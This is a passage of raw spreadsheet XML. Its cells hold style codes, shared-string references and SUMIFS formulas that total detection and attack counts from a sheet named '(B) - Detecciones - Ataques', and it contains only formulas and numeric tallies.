      <c r="Q7" s="292"/>
      <c r="R7" s="292"/>
      <c r="S7" s="292"/>
      <c r="T7" s="292"/>
      <c r="U7" s="293"/>
      <c r="W7" s="294" t="s">
        <v>2632</v>
      </c>
      <c r="X7" s="292"/>
      <c r="Y7" s="292"/>
      <c r="Z7" s="292"/>
      <c r="AA7" s="292"/>
      <c r="AB7" s="292"/>
      <c r="AC7" s="292"/>
      <c r="AD7" s="292"/>
      <c r="AE7" s="292"/>
      <c r="AF7" s="292"/>
      <c r="AG7" s="292"/>
      <c r="AH7" s="292"/>
      <c r="AI7" s="292"/>
      <c r="AJ7" s="292"/>
      <c r="AK7" s="292"/>
      <c r="AL7" s="292"/>
      <c r="AM7" s="292"/>
      <c r="AN7" s="292"/>
      <c r="AO7" s="292"/>
      <c r="AP7" s="292"/>
      <c r="AQ7" s="292"/>
      <c r="AR7" s="292"/>
      <c r="AS7" s="292"/>
      <c r="AT7" s="292"/>
      <c r="AU7" s="292"/>
      <c r="AV7" s="292"/>
      <c r="AW7" s="292"/>
      <c r="AX7" s="292"/>
      <c r="AY7" s="292"/>
      <c r="AZ7" s="292"/>
      <c r="BA7" s="292"/>
      <c r="BB7" s="292"/>
      <c r="BC7" s="292"/>
      <c r="BD7" s="292"/>
      <c r="BE7" s="292"/>
      <c r="BF7" s="292"/>
      <c r="BG7" s="292"/>
      <c r="BH7" s="292"/>
      <c r="BI7" s="292"/>
      <c r="BJ7" s="292"/>
      <c r="BK7" s="292"/>
      <c r="BL7" s="292"/>
      <c r="BM7" s="292"/>
      <c r="BN7" s="292"/>
      <c r="BO7" s="292"/>
      <c r="BP7" s="292"/>
      <c r="BQ7" s="292"/>
      <c r="BR7" s="292"/>
      <c r="BS7" s="292"/>
      <c r="BT7" s="292"/>
      <c r="BU7" s="292"/>
      <c r="BV7" s="292"/>
      <c r="BW7" s="292"/>
      <c r="BX7" s="292"/>
      <c r="BY7" s="292"/>
      <c r="BZ7" s="292"/>
      <c r="CA7" s="292"/>
      <c r="CB7" s="292"/>
      <c r="CC7" s="292"/>
      <c r="CD7" s="292"/>
      <c r="CE7" s="292"/>
      <c r="CF7" s="292"/>
      <c r="CG7" s="292"/>
      <c r="CH7" s="292"/>
      <c r="CI7" s="292"/>
      <c r="CJ7" s="292"/>
      <c r="CK7" s="292"/>
      <c r="CL7" s="292"/>
      <c r="CM7" s="292"/>
      <c r="CN7" s="292"/>
      <c r="CO7" s="292"/>
      <c r="CP7" s="292"/>
      <c r="CQ7" s="292"/>
      <c r="CR7" s="292"/>
      <c r="CS7" s="292"/>
      <c r="CT7" s="292"/>
      <c r="CU7" s="292"/>
      <c r="CV7" s="292"/>
      <c r="CW7" s="292"/>
      <c r="CX7" s="292"/>
      <c r="CY7" s="293"/>
      <c r="CZ7" s="574"/>
      <c r="DA7" s="574"/>
      <c r="DB7" s="574"/>
      <c r="DC7" s="575" t="s">
        <v>2633</v>
      </c>
      <c r="DD7" s="3"/>
      <c r="DE7" s="282" t="s">
        <v>2634</v>
      </c>
      <c r="DF7" s="576" t="s">
        <v>2635</v>
      </c>
      <c r="DG7" s="577" t="s">
        <v>2636</v>
      </c>
      <c r="DH7" s="578" t="s">
        <v>2637</v>
      </c>
      <c r="DI7" s="579" t="s">
        <v>2638</v>
      </c>
      <c r="DJ7" s="576" t="s">
        <v>2639</v>
      </c>
      <c r="DK7" s="577" t="s">
        <v>2640</v>
      </c>
      <c r="DL7" s="578" t="s">
        <v>2641</v>
      </c>
      <c r="DM7" s="580"/>
      <c r="DN7" s="580"/>
      <c r="DO7" s="581" t="s">
        <v>2642</v>
      </c>
      <c r="DP7" s="3"/>
      <c r="DQ7" s="574"/>
      <c r="DR7" s="582" t="s">
        <v>2643</v>
      </c>
      <c r="DS7" s="3"/>
      <c r="DT7" s="574"/>
      <c r="DU7" s="574"/>
      <c r="DV7" s="574"/>
      <c r="DW7" s="583" t="s">
        <v>2452</v>
      </c>
      <c r="DX7" s="584" t="s">
        <v>2477</v>
      </c>
      <c r="DY7" s="585">
        <f>E21</f>
        <v>0.01603561549</v>
      </c>
      <c r="DZ7" s="574"/>
      <c r="EA7" s="574"/>
      <c r="EB7" s="574"/>
      <c r="EH7" s="574"/>
      <c r="EI7" s="574"/>
      <c r="EJ7" s="574"/>
      <c r="EK7" s="574"/>
      <c r="EL7" s="574"/>
      <c r="EM7" s="571"/>
      <c r="EN7" s="574"/>
      <c r="EO7" s="574"/>
      <c r="EP7" s="574"/>
      <c r="EQ7" s="574"/>
      <c r="ER7" s="574"/>
      <c r="ES7" s="574"/>
      <c r="ET7" s="574"/>
      <c r="EV7" s="574"/>
      <c r="EW7" s="574"/>
      <c r="EX7" s="574"/>
      <c r="EY7" s="574"/>
      <c r="EZ7" s="574"/>
      <c r="FA7" s="574"/>
      <c r="FB7" s="574"/>
      <c r="FC7" s="574"/>
      <c r="FD7" s="574"/>
      <c r="FE7" s="574"/>
      <c r="FF7" s="574"/>
      <c r="FG7" s="574"/>
      <c r="FH7" s="574"/>
      <c r="FI7" s="574"/>
      <c r="FJ7" s="574"/>
      <c r="FK7" s="574"/>
      <c r="FL7" s="574"/>
      <c r="FM7" s="574"/>
      <c r="FS7" s="574"/>
      <c r="FT7" s="574"/>
      <c r="FU7" s="574"/>
      <c r="FV7" s="574"/>
      <c r="FW7" s="574"/>
      <c r="FX7" s="574"/>
    </row>
    <row r="8">
      <c r="D8" s="497" t="s">
        <v>2443</v>
      </c>
      <c r="E8" s="499" t="s">
        <v>2444</v>
      </c>
      <c r="G8" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H8" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I8" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J8" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K8" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L8" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M8" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N8" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O8" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P8" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q8" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R8" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S8" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T8" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U8" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W8" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="X8" s="318" t="s">
        <v>2108</v>
      </c>
      <c r="Y8" s="319" t="s">
        <v>2177</v>
      </c>
      <c r="Z8" s="318" t="s">
        <v>2193</v>
      </c>
      <c r="AA8" s="318" t="s">
        <v>2095</v>
      </c>
      <c r="AB8" s="318" t="s">
        <v>2074</v>
      </c>
      <c r="AC8" s="318" t="s">
        <v>2061</v>
      </c>
      <c r="AD8" s="318" t="s">
        <v>2015</v>
      </c>
      <c r="AE8" s="318" t="s">
        <v>953</v>
      </c>
      <c r="AF8" s="318" t="s">
        <v>1040</v>
      </c>
      <c r="AG8" s="318" t="s">
        <v>1012</v>
      </c>
      <c r="AH8" s="318" t="s">
        <v>1164</v>
      </c>
      <c r="AI8" s="318" t="s">
        <v>1848</v>
      </c>
      <c r="AJ8" s="318" t="s">
        <v>2300</v>
      </c>
      <c r="AK8" s="318" t="s">
        <v>1138</v>
      </c>
      <c r="AL8" s="318" t="s">
        <v>974</v>
      </c>
      <c r="AM8" s="318" t="s">
        <v>1108</v>
      </c>
      <c r="AN8" s="318" t="s">
        <v>1702</v>
      </c>
      <c r="AO8" s="318" t="s">
        <v>1626</v>
      </c>
      <c r="AP8" s="320" t="s">
        <v>636</v>
      </c>
      <c r="AQ8" s="318" t="s">
        <v>1726</v>
      </c>
      <c r="AR8" s="318" t="s">
        <v>822</v>
      </c>
      <c r="AS8" s="318" t="s">
        <v>445</v>
      </c>
      <c r="AT8" s="318" t="s">
        <v>1747</v>
      </c>
      <c r="AU8" s="318" t="s">
        <v>989</v>
      </c>
      <c r="AV8" s="318" t="s">
        <v>246</v>
      </c>
      <c r="AW8" s="318" t="s">
        <v>2242</v>
      </c>
      <c r="AX8" s="318" t="s">
        <v>1282</v>
      </c>
      <c r="AY8" s="318" t="s">
        <v>429</v>
      </c>
      <c r="AZ8" s="318" t="s">
        <v>912</v>
      </c>
      <c r="BA8" s="318" t="s">
        <v>1837</v>
      </c>
      <c r="BB8" s="318" t="s">
        <v>1510</v>
      </c>
      <c r="BC8" s="318" t="s">
        <v>1411</v>
      </c>
      <c r="BD8" s="318" t="s">
        <v>1397</v>
      </c>
      <c r="BE8" s="318" t="s">
        <v>1374</v>
      </c>
      <c r="BF8" s="318" t="s">
        <v>677</v>
      </c>
      <c r="BG8" s="318" t="s">
        <v>790</v>
      </c>
      <c r="BH8" s="318" t="s">
        <v>262</v>
      </c>
      <c r="BI8" s="318" t="s">
        <v>771</v>
      </c>
      <c r="BJ8" s="318" t="s">
        <v>724</v>
      </c>
      <c r="BK8" s="318" t="s">
        <v>211</v>
      </c>
      <c r="BL8" s="318" t="s">
        <v>805</v>
      </c>
      <c r="BM8" s="318" t="s">
        <v>932</v>
      </c>
      <c r="BN8" s="318" t="s">
        <v>1306</v>
      </c>
      <c r="BO8" s="318" t="s">
        <v>1903</v>
      </c>
      <c r="BP8" s="318" t="s">
        <v>2335</v>
      </c>
      <c r="BQ8" s="318" t="s">
        <v>1983</v>
      </c>
      <c r="BR8" s="318" t="s">
        <v>1999</v>
      </c>
      <c r="BS8" s="318" t="s">
        <v>1971</v>
      </c>
      <c r="BT8" s="318" t="s">
        <v>1201</v>
      </c>
      <c r="BU8" s="318" t="s">
        <v>750</v>
      </c>
      <c r="BV8" s="318" t="s">
        <v>666</v>
      </c>
      <c r="BW8" s="318" t="s">
        <v>892</v>
      </c>
      <c r="BX8" s="318" t="s">
        <v>1214</v>
      </c>
      <c r="BY8" s="318" t="s">
        <v>1293</v>
      </c>
      <c r="BZ8" s="318" t="s">
        <v>1331</v>
      </c>
      <c r="CA8" s="318" t="s">
        <v>2215</v>
      </c>
      <c r="CB8" s="318" t="s">
        <v>2261</v>
      </c>
      <c r="CC8" s="318" t="s">
        <v>359</v>
      </c>
      <c r="CD8" s="318" t="s">
        <v>1230</v>
      </c>
      <c r="CE8" s="318" t="s">
        <v>1812</v>
      </c>
      <c r="CF8" s="318" t="s">
        <v>1958</v>
      </c>
      <c r="CG8" s="318" t="s">
        <v>1667</v>
      </c>
      <c r="CH8" s="318" t="s">
        <v>505</v>
      </c>
      <c r="CI8" s="318" t="s">
        <v>312</v>
      </c>
      <c r="CJ8" s="318" t="s">
        <v>2289</v>
      </c>
      <c r="CK8" s="318" t="s">
        <v>411</v>
      </c>
      <c r="CL8" s="318" t="s">
        <v>1361</v>
      </c>
      <c r="CM8" s="318" t="s">
        <v>701</v>
      </c>
      <c r="CN8" s="318" t="s">
        <v>586</v>
      </c>
      <c r="CO8" s="318" t="s">
        <v>294</v>
      </c>
      <c r="CP8" s="318" t="s">
        <v>339</v>
      </c>
      <c r="CQ8" s="318" t="s">
        <v>370</v>
      </c>
      <c r="CR8" s="318" t="s">
        <v>394</v>
      </c>
      <c r="CS8" s="318" t="s">
        <v>1687</v>
      </c>
      <c r="CT8" s="318" t="s">
        <v>486</v>
      </c>
      <c r="CU8" s="318" t="s">
        <v>1889</v>
      </c>
      <c r="CV8" s="318" t="s">
        <v>1187</v>
      </c>
      <c r="CW8" s="318" t="s">
        <v>560</v>
      </c>
      <c r="CX8" s="318" t="s">
        <v>1175</v>
      </c>
      <c r="CY8" s="321" t="s">
        <v>1926</v>
      </c>
      <c r="CZ8" s="403"/>
      <c r="DA8" s="403"/>
      <c r="DB8" s="403"/>
      <c r="DC8" s="586" t="s">
        <v>2448</v>
      </c>
      <c r="DD8" s="587" t="s">
        <v>2496</v>
      </c>
      <c r="DE8" s="588" t="s">
        <v>2515</v>
      </c>
      <c r="DF8" s="589" t="s">
        <v>2644</v>
      </c>
      <c r="DG8" s="590" t="s">
        <v>2645</v>
      </c>
      <c r="DH8" s="591" t="s">
        <v>2646</v>
      </c>
      <c r="DI8" s="588" t="s">
        <v>2515</v>
      </c>
      <c r="DJ8" s="589" t="s">
        <v>2644</v>
      </c>
      <c r="DK8" s="590" t="s">
        <v>2645</v>
      </c>
      <c r="DL8" s="591" t="s">
        <v>2646</v>
      </c>
      <c r="DM8" s="592"/>
      <c r="DN8" s="592"/>
      <c r="DO8" s="593" t="s">
        <v>2448</v>
      </c>
      <c r="DP8" s="594" t="s">
        <v>2496</v>
      </c>
      <c r="DQ8" s="403"/>
      <c r="DR8" s="593" t="s">
        <v>2448</v>
      </c>
      <c r="DS8" s="594" t="s">
        <v>2496</v>
      </c>
      <c r="DT8" s="403"/>
      <c r="DU8" s="403"/>
      <c r="DV8" s="403"/>
      <c r="DW8" s="595" t="s">
        <v>2462</v>
      </c>
      <c r="DX8" s="596" t="s">
        <v>2478</v>
      </c>
      <c r="DY8" s="337">
        <f>1-(DD23/DE23)</f>
        <v>0</v>
      </c>
      <c r="DZ8" s="403"/>
      <c r="ED8" s="576" t="s">
        <v>2429</v>
      </c>
      <c r="EE8" s="221"/>
      <c r="EF8" s="221"/>
      <c r="EG8" s="222"/>
      <c r="EH8" s="403"/>
      <c r="EI8" s="403"/>
      <c r="EJ8" s="403"/>
      <c r="EK8" s="403"/>
      <c r="EL8" s="403"/>
      <c r="EM8" s="597"/>
      <c r="EN8" s="403"/>
      <c r="EO8" s="275" t="s">
        <v>2647</v>
      </c>
      <c r="EP8" s="2"/>
      <c r="EQ8" s="2"/>
      <c r="ER8" s="598"/>
      <c r="ES8" s="598"/>
      <c r="ET8" s="599"/>
      <c r="EV8" s="403"/>
      <c r="EW8" s="600" t="s">
        <v>2648</v>
      </c>
      <c r="EX8" s="221"/>
      <c r="EY8" s="221"/>
      <c r="EZ8" s="222"/>
      <c r="FA8" s="403"/>
      <c r="FB8" s="403"/>
      <c r="FC8" s="403"/>
      <c r="FD8" s="403"/>
      <c r="FE8" s="403"/>
      <c r="FF8" s="403"/>
      <c r="FG8" s="403"/>
      <c r="FH8" s="403"/>
      <c r="FI8" s="403"/>
      <c r="FJ8" s="403"/>
      <c r="FK8" s="403"/>
      <c r="FN8" s="600" t="s">
        <v>2649</v>
      </c>
      <c r="FO8" s="221"/>
      <c r="FP8" s="221"/>
      <c r="FQ8" s="222"/>
      <c r="FR8" s="403"/>
      <c r="FS8" s="403"/>
      <c r="FT8" s="403"/>
      <c r="FU8" s="403"/>
      <c r="FV8" s="403"/>
      <c r="FW8" s="403"/>
      <c r="FX8" s="403"/>
    </row>
    <row r="9" ht="41.25" customHeight="1">
      <c r="D9" s="434">
        <f>SUM('(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>247720</v>
      </c>
      <c r="E9" s="354">
        <f>SUM('(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>185276</v>
      </c>
      <c r="F9" s="350"/>
      <c r="G9" s="497" t="s">
        <v>2461</v>
      </c>
      <c r="H9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>9461</v>
      </c>
      <c r="I9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="J9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>252</v>
      </c>
      <c r="K9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>39</v>
      </c>
      <c r="L9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="M9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="N9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>22</v>
      </c>
      <c r="O9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>9923</v>
      </c>
      <c r="P9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>727</v>
      </c>
      <c r="Q9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>333</v>
      </c>
      <c r="R9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>148</v>
      </c>
      <c r="S9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>66858</v>
      </c>
      <c r="T9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>114</v>
      </c>
      <c r="U9" s="602">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>1046</v>
      </c>
      <c r="W9" s="497" t="s">
        <v>2461</v>
      </c>
      <c r="X9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>9394</v>
      </c>
      <c r="Y9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>59</v>
      </c>
      <c r="AA9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>7</v>
      </c>
      <c r="AB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>6951</v>
      </c>
      <c r="AC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
        <v>0</v>
      </c>
      <c r="AD9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>130</v>
      </c>
      <c r="AG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>5</v>
      </c>
      <c r="AH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>9</v>
      </c>
      <c r="AJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>90</v>
      </c>
      <c r="AK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>18</v>
      </c>
      <c r="AL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>27</v>
      </c>
      <c r="AN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>10</v>
      </c>
      <c r="AP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>2</v>
      </c>
      <c r="AQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>3</v>
      </c>
      <c r="AS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>7</v>
      </c>
      <c r="AU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>11</v>
      </c>
      <c r="AV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>3</v>
      </c>
      <c r="AW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>1</v>
      </c>
      <c r="AX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>1</v>
      </c>
      <c r="AY9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>3</v>
      </c>
      <c r="AZ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>10</v>
      </c>
      <c r="BA9" s="173">
